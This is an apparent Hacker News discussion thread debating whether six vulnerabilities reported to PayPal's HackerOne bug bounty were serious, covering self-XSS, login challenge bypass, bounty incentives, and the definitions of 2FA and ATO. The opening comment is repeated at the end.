People have a weird mental model of how big-company bug bounty programs work. Paypal --- a big company for sure, with a large and talented application security team --- is not interested in stiffing researchers out of bounties. They have literally no incentive to do so. In fact: the people tasked with running the bounty probably have the opposite incentive: the program looks better when it is paying out bounties for strong findings.
Here are the vulnerabilities in their report:
1. They can suppress a new-computer login challenge (they call this "2FA", but this is a risk-based login or anti-ATO feature, not 2FA).
2. They can register accounts for one phone, then change it to another phone, to "bypass" phone number confirmation.
3. There are risk-based controls in Paypal that prevent transactions when anomalies are detected, and some of them can apparently be defeated with brute force.
4. They can change names on accounts they control.
5. They found what appears to be self-XSS in a support chat system.
6. They found what appears to be self-XSS in the security questions challenge inputs.
None of these are sev:hi vulnerabilities, let alone "critical". 2 of them --- #4 and #6 --- are duplicates of other people's issues. Self-XSS vulnerabilities are often excluded entirely from bounty programs.
For the last 3 hours, the top comment on this thread has been an analysis saying that, because Paypal is PCI-encumbered, and HackerOne reports can function as "assessments" for PCI attestations, Paypal is in danger of losing its PCI status (and the fact that it won't is evidence that they are "too big to fail"). To put it gently: that is not how any of this stuff works. In reality, formal bug bounty programs are a firehose of reports suggesting that DKIM configuration quirks are critical vulnerabilities, and nobody in the world would expect any kind of regulatory outcome simply from the way a bounty report does or doesn't get handled. It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.
The login challenge bypass finding was actually interesting (it would be more interesting if they fully disclosed what it was and what Paypal's response was). But these reporters have crudded up their story with standard bug-bounty-reporter hype, and made it very difficult to judge what they found. I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).
For #5 I believe it's not just a self-XSS, but also executes on the support agents browser, allowing you to potentially exfiltrate their cookies:
> Anyone can write malicious code into the chatbox and PayPal’s system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.
> It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.
Really? Most companies? That seems like an extraordinary claim.
I'm not a security researcher but if I stumbled on some security issue in something that's not open-source and not owned by my employer, the only way I'd consider reporting it is if they have a bug bounty / responsible disclosure program. Otherwise I'd expect it would be about as likely for me to receive a "thank you" as a knock on the door from law enforcement.
That depends on the kind of issue you found and the type of service it was, but, yes: without an authorization of some sort, it's probably unlawful to test for large classes of serverside vulnerabilities. The kind of work Project Zero does, on the other hand, is both more impactful and does not usually require authorization, since they're analyzing software running on their own machines.
Most companies should not run bug bounties. Most companies haven't even had a competently run software security assessment (either from an in-house software security expert or from a retained third party). Authorizing serverside tests and soliciting inbound reports from random people is not on the list of "first things you should do to get your house in order", and most people do not have their houses in order.
If this sounds like an extraordinary claim, I'd suggest maybe paying more attention to software security people and less attention to Reddit and HN stories about bug bounties; it's easy to get the wrong impression from message board threads, and as you can pretty plainly see, a lot of commentary on message board threads isn't well-informed.
Katie Moussouris is maybe a good starting point if you want to inject the "bug bounties can be bad" take directly into your veins. But there are lots of other people to listen to; it's a mainstream take. If you want a pro-bounty take, you can read what Cody Brocious writes. My (mainstream) take isn't the only decent take.
> I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).
I agree that they have some issues with the way they've reported it, and I agree with your numbered points except that they imply that #5 may make the support agent vulnerable, but I'm not sure you can say PayPal haven't acted abusively. Many of the reports are legitimate vulnerabilities even if they aren't critical ones. The first is clearly a security issue yet PayPal have said that it isn't. In return they have received nothing but a reputation hit, and this is clearly unfair.
Do PayPal specifically say that anything involving stolen details are out of scope? This seems a bit weak considering they have numerous systems in place to combat misuse of stolen accounts. And even if they do it doesn't explain #2.
edit: To answer my own question, the page at lists "Vulnerabilities involving stolen credentials or physical access to a device" as out of scope for web applications. They likely intend that to apply to mobile applications also, but they've structured the page in a way that makes that ambiguous.
This is why this article is a bad HN submission - it's not really on everybody on HN to figure out whether these reports are any good, whether they were handled correctly by PayPal, HackerOne, etc. It's up to the people writing them up to make this as clear as possible and they don't come anywhere close to that. This just creates a massive discussion driven by speculation and off-topic tangents about a problem people had on ebay and talmudic regulatory 'analysis'.
What proof do you have that #6 is not persistent XSS? If it is, that's a potentially brutal vuln (as persistent XSS often is), even if you need the users password to exploit it.
And persistent XSS is definitely not out of scope according to PayPal's guidelines. https://hackerone.com/paypal
Why are you saying #6 --- are duplicates of other people's issues. ? It must have been marked as dupe of N/A. They would haved gained rep if it was a dupe of someone elses report. They lost rep, so it was most likely marked as dupe of an N/A.
As I mention below, the big problem is the OP didn't include POCs. It's easy to claim "oh this is can be exploited so easily" but without a POC, it's not always clear and perhaps he missed some detail that made his assumptions incorrect.
Anyways, I do have to say hackerone looks pretty cool. This is the first I've seen it and they seem like they are working very hard (we all should be working hard) to make this work for everyone. They are likely just victim's of their success.
I agree that real stored XSS is a serious issue. Here, they're using a MITM to get the XSS payload injected, and Paypal has closed it saying it's not "externally exploitable". It sure looks like self-XSS to me. I agree: a POC would clear this up.
All I'll say beyond that is that if they had doc'd a real stored XSS bug in Paypal, my assumption would be that they'd get a bounty for that. That they did not get a bounty for it suggests that it was invalid. Paypal does not have any incentive to stiff researchers on valid submissions; they have in fact the opposite incentive.
Uh, some of these vulnerabilities are critical. And just because corporate signs up for a HackerOne bug bounty doesn't mean that the security engineers managing triage are happy about it.
Security analysis and penetration testing always results in the perception that the security auditor is calling their baby ugly. Always.
Sorry, on further thought while I still disagree with the analysis above as being overly dismissive, I think the OP may share some blame for not writing higher quality reports with POCs. Also, the OP doesn't explain whether or not they saw the original reports for those marked Duplicate. That's a very critical point. See here -
For anyone actually interested here and not just drive by commenting (like me, ahem), it's worthwhile looking into the platform in more detail. See my post below -
I don't understand your argument here. "You patch you pay" is not a market term on any bug bounty; people report sev:infos all the time that ultimately get patched, but aren't worth anything (this is why some bounty programs stock sticker and t-shirt SWAG, to placate these submissions).
Meanwhile: I don't care even a little bit how Paypal arrived at their "duplicate" response, because Paypal has no incentive to deny a bounty for a valid bug. Like I said above, they have the opposite incentive. Duplicates happen all the time. If Paypal --- or any other large company --- says it was a duplicate bug, it would take extraordinarily clear evidence for me to believe otherwise.
Some of these things are probably not true for fly-by-night companies that set up bounty programs (a lot of people run bounties that shouldn't). I'm not denying that there are random companies that do ruthlessly screw with bounty submitters; I don't know any of them, but I believe they exist. But the money Paypal spends on bounties, all put together, barely even qualifies as a rounding error. They do not care; nobody serious cares enough to squelch reports to avoid paying bounties.
The fact that this was reported as "six critical vulnerabilities" is enough for me to tilt the credibility scale in the other direction.
Later
I'd appreciate it if you didn't edit your comment out from under my reply; the convention on HN is to update your post to clarify your argument in a PS, not to simply delete the parts you felt didn't hold up to scrutiny.
Oh, sorry about that. Bad habit. Had hoped to get to it before you wasted your time.
That all said, I think you have a knee jerk reaction (given your history) to side with Large Corp. It shows here and really felt like that. Way overly dismissive and condescending.
Having personally worked for large corporations, I can say that the "it's not personal, it's business" motto is pure evil bullshit better suited for mob.
If you (the royal you) can't treat people with respect that they deserve, don't engage until you can.
My history? I haven't worked for a "large corp" since 1998. Our company works exclusively with startups.
When I say that Paypal has incentives not to ruthlessly deny bounties, I mean actual incentives, not "it feels good to do good" type stuff. Even if their reputation among bounty hunters is factored out: they literally have an incentive to pay bounties. That's the metric by which bounty programs are judged.
I agree -- the tone of the article was cloak-and-daggers, which makes me think things are not what they seem they are. Unless we fully understand the exact set of issues, it is difficult to decide either way.
Sadly, this also undermines trust in the overall state of "security research", which most of the time, borders on being silly. :-/
This is on the more-competent end of the spectrum of bounty submissions, for what it's worth. Because the median bounty submission is very, very bad.
These people at least appear to have done some actual work. Paypal is probably one of the most overfished ponds in application security, and they didn't come up with much, but it's at least sort of interesting.
out of curiosity, do you work at PayPal or is the first paragraph all assumptions?
One would have thought Wells Fargo had a talented team of people to catch their millions of fake accounts they made, but alas it went on for a decade. I will always assume companies have their backs turned to security, until proven otherwise, regardless of size or perceived risk.
First, I do not work at Paypal, and have never worked at Paypal.
Second, if I did, it would be none of your business.
Third, comments like these are forbidden by the site guidelines, which demand that you not make accusations of astroturfing simply because you disagree with a comment.
Charitably interpreted, it's 'just' an accusation you can't possibly know the quality of PayPal's security team since you don't work there and lack the necessary insider knowledge. Calling you a naïf, not a shill!
FWIW. I wasn't claiming either, I was questioning source of knowledge, as the claim seemed to be factually informed, but are in fact just the posters opinion on the matter.
i am not assuming anything nor making any accusations. I am simply inquiring as to the source of the claim made. i guess, we will establish that its just the opinion of the poster.
> 1. They can suppress a new-computer login challenge (they call this "2FA", but this is a risk-based login or anti-ATO feature, not 2FA).
2FA means 2 Factor Authentication. This works by forcing one to use two different forms of identification to authenticate, such as login/password and, in this case, identification of the computer used.
So, with all respect sir, what I'm saying is while this isn't the best 2FA, it absolutely IS 2FA by definition.
This feature is not 2FA, and your argument is incoherent even if you fix the terminology, because many anti-ATO systems are heuristic and intriniscally "bypassable" by design, and yet you still want services to have them. ATO is an arms race.
This anti-ATO mechanism is asking for a code delivered via email (something you have) in order to grant access to the account. That is authentication via an additional factor, i.e. 2FA.
If you implemented this feature and called it your "2FA system", security engineers would laugh at you. It's clearly not 2FA. And, of course, Paypal has actual 2FA.
Authorization is not authentication, by definition. Furthermore, your link is talking about an entirely unrelated meaning of ATO. I believe tptacek meant it to stand for "account take-over".
Same difference. Anti account take over and account authentication, because similar methods would be deployed (i.e., multifactor authentication, heuristic, etc.)
At risk of pointing out the obvious, ATO (as in Authorization To Operate) has nothing to do with logging in, technical authentication, or technical authorization. An ATO is a piece of paper or equivalent that lets your business deploy a product or solution, primarily used in the government space. It’s a contract that a human/organization signs, not a part of the login process for a computer.
Here are the vulnerabilities in their report:
1. They can suppress a new-computer login challenge (they call this "2FA", but this is a risk-based login or anti-ATO feature, not 2FA).
2. They can register accounts for one phone, then change it to another phone, to "bypass" phone number confirmation.
3. There are risk-based controls in Paypal that prevent transactions when anomalies are detected, and some of them can apparently be defeated with brute force.
4. They can change names on accounts they control.
5. They found what appears to be self-XSS in a support chat system.
6. They found what appears to be self-XSS in the security questions challenge inputs.
None of these are sev:hi vulnerabilities, let alone "critical". 2 of them --- #4 and #6 --- are duplicates of other people's issues. Self-XSS vulnerabilities are often excluded entirely from bounty programs.
For the last 3 hours, the top comment on this thread has been an analysis saying that, because Paypal is PCI-encumbered, and HackerOne reports can function as "assessments" for PCI attestations, Paypal is in danger of losing its PCI status (and the fact that it won't is evidence that they are "too big to fail"). To put it gently: that is not how any of this stuff works. In reality, formal bug bounty programs are a firehose of reports suggesting that DKIM configuration quirks are critical vulnerabilities, and nobody in the world would expect any kind of regulatory outcome simply from the way a bounty report does or doesn't get handled. It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.
The login challenge bypass finding was actually interesting (it would be more interesting if they fully disclosed what it was and what Paypal's response was). But these reporters have crudded up their story with standard bug-bounty-reporter hype, and made it very difficult to judge what they found. I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).